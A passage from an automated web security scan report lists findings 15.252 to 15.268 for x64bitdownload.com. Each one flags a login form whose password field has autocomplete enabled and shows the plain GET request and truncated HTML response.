Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.252. http://www.x64bitdownload.com/64-bit-posts-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-posts-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-posts-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89038


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.253. http://www.x64bitdownload.com/64-bit-rar-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rar-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-rar-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.254. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.255. http://www.x64bitdownload.com/64-bit-reader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.256. http://www.x64bitdownload.com/64-bit-reading-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reading-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-reading-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.257. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.258. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-client-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-rss-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.259. http://www.x64bitdownload.com/64-bit-rss-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-rss-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.260. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-feed-reader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-rss-feed-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.261. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-reader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-rss-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.262. http://www.x64bitdownload.com/64-bit-search-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-search-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-search-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:22 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.263. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ssl-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-ssl-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.264. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronization-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-synchronization-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.265. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronize-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-synchronize-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.266. http://www.x64bitdownload.com/64-bit-topic-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-topic-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-topic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.267. http://www.x64bitdownload.com/64-bit-troll-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-troll-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.268. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-killer-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-troll-killer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

